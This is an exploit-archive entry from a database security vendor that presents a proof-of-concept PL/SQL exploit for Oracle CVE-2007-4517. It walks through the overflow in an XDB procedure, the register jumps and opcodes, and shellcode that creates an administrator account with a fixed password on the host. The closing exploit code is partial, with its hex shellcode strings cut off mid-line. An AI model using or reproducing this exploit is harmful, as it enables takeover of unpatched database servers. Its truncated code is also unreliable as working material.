EKU-ID: 1283 CVE: 2007-4517 OSVDB-ID:
Author: David Maman Published: 2011-11-08 Verified: Verified



# Exploit Title: New exploit to Oracle CVE-2007-4517 vulnerability
# Date: 11,2,2011
# Author: David Maman and the GreenSQL Team
# Software Link:
# Version: 0.1
# Tested on: Oracle Database 10g Express Edition
# CVE : New exploit to CVE-2007-4517

As part of GreenSQL’s Database security research,  we’ve been validating and extending coverage of known and unknown vulnerabilities in order to increase GreenSQL product security, at this post we will reveal a full working Prove of Concept for the CVE-2007-4517 vulnerability which executes arbitrary code.
The Exploit: PL/SQL/2007-4517 exploit is a PL/SQL procedure that exploits the CVE-2007-4517 vulnerability, also known as Oracle Database XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA Procedure Multiple Argument Remote Overflow.
The vulnerability is caused due to a boundary error in the XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA procedure when processing the OWNER and NAME arguments to create an SQL query.
This can be exploited to cause a buffer overflow by passing overly long OWNER and NAME arguments to the affected procedure.

System Changes:
•    New administrative user account.
(Username: GreenSQL, Password:GreenSQL)
•    OracleServiceXE service turns off.

Technical Information
The exploits has been tested on:
• Windows XP Professional SP3.
• Oracle Database 10g Express Edition.

All the known exploits and POC’s developed for this vulnerability so far are Denial-of-Service exploits.

This is a New exploit that actually executes arbitrary code and adds a new user account to the database host operating system.

The Exploit
The PL/SQL procedure calls to the xDb.XDB_PITRIG_PKG.PITRIG_DROPMETADATA() function with two arguments:
1. “123”.
2. Buffer (2305 bytes)

The buffer consists of payload, jmp instructions, arithmetic instructions and garbage.

When executing the code, the EBX contains the starting address of the buffer + 0x7A5.

In order to execute the payload in the buffer, the following steps needs to be performed:
1. The EIP should point to an address contains the jmp EBX instruction.
2. At the [EBX] address, the exploit needs to jmp -0x7A5 to the start of the buffer.

Jumping to EBX
In order to jump to the address in the EBX register, the EIP should be set to 0x 095F7160.

Jumping to the Payload
In order to execute the payload, the following instructions needs to be performed:
sub ebx, 0x7a5
jmp ebx

The opcodes of the first instruction are:
0ª81, 0xEB, 0xA5, 0ª07, 0ª00, 0ª00.
One of the limitations of HEXTORAW() function, is that it’s not able to deal with 0ª00 characters.
Because of that reason, instead of using the sub ebx, 0x7a5 instruction, the following instructions need to be performed:
sub bl,0xb0
add bh,0xfa
jmp ebx

Which are equivalent to:
sub ebx, 0x5b0
jmp ebx

Which is equivalent to jmp ebx-0x5b0.

The opcodes of those instructions are:
0ª80, 0xEB, 0xB0, 0ª80, 0xC7, 0xFA, 0xFF, 0xE3, which are able to be processed by the HEXTORAW() function.

The Payload
The payload’s size is 308 bytes (of 0x7A5-0x5B0 = 0x1F5 = 501 payload’s space)

The payload creates a new user account, called “GreenSQL”, with the password “GreenSQL”.
After creating the user account, it adds the user to the “Administrators” group.

The Exploit POC

## GreenSQL   ########    Proof-of-Concept     ##
## This code is for educational purposes only  ##
 sc varchar2(32767);
 junk varchar2(32767);
 junk2 varchar2(32767);
 EBX varchar2(32767);
 junk3 varchar2(32767);
 JMP2SC varchar2(32767);
 junk4 varchar2(32767);
 EIP varchar2(32767);
 junk5 varchar2(32767);
 sc := sc || UTL_RAW.CAST_TO_varchar2(HEXTORAW('33634c29bd8
 sc := sc || UTL_RAW.CAST_TO_varchar2(HEXTORAW('a379282afa8
 sc := sc || UTL_RAW.CAST_TO_varchar2(HEXTORAW('2afd5fb94c5
 EBX:=UTL_RAW.CAST_TO_varchar2(HEXTORAW('EB10')) || 'CCCCC';
 EIP:= UTL_RAW.CAST_TO_varchar2(HEXTORAW('095f7160095f7160095f71
 60095f7160095f7160095f7160095f7160095f7160095f7160')); -- jmp EBX